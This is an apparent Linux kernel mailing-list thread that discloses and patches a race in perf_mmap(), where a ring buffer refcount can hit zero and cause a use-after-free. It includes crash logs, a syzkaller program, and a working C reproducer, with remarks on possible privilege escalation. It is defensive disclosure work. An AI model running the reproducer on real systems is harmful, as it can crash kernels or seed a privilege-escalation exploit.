// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
Syzkaller reported a "refcount_t: addition on 0; use-after-free" warning
in perf_mmap().
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
--
2.51.0
|
{
"author": "Haocheng Yu <yuhaocheng035@gmail.com>",
"date": "Mon, 2 Feb 2026 15:44:35 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning, followed by a memory leak warning.
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
